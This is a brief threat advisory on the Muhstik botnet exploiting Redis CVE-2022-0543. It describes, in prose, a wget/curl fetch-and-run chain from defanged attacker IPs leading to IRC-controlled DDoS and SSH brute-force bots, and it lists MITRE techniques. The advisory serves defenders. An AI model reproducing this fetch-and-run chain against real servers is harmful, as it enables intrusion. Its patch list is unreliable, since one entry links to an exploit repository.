Muhstik botnet adds another vulnerability exploit to its arsenal

THREAT LEVEL: Red.

For a detailed advisory, download the pdf file here

Muhstik malware has begun attacking Redis Servers by exploiting a recently reported vulnerability, CVE-2022-0543. This flaw can be found in several Redis Debian packages. The attack began on March 11, 2022, and was carried out by a threat actor who targeted Confluence servers in September 2021 and Log4j in December. The payload is a Muhstik bot variation that may be used to perform DDOS assaults.

The threat actor first executes the Lua scripts to exploit the vulnerability found in Redis Debian servers. The threat actor attempts to download “Russia.sh” from “106[.]246.224.219” using wget or curl. It stores it as “/tmp/russ” and runs it which will download and run Linux payload from 160[.]16.58.163. These binaries have been recognized as Muhstik bot variants. This botnet then connects to an IRC server to receive commands that download files, run shell commands, and carry out attacks like flood attacks and SSH brute force attacks.

The Mitre TTPs commonly used by Muhstik malware are:

TA0001: Initial Access

TA0011: Command and Control

TA0042: Resource Development

TA0008:  Lateral Movement

T1071: Application Layer Protocol

T1588.006: Obtain Capabilities: Vulnerabilities

T1190: Exploit Public-Facing Application

T1021.004: Remote Services: SSH T1059.004: Command and Scripting Interpreter: Unix Shell

Vulnerability Details

Indicators of Compromise (IoCs)

Patch Links

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

https://security-tracker.debian.org/tracker/CVE-2022-0543

http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

https://github.com/g0rx/CVE-2018-7600-Drupal-RCE

https://jira.atlassian.com/browse/CONFSERVER-67940

https://logging.apache.org/log4j/2.x/manual/migration.html

References

https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers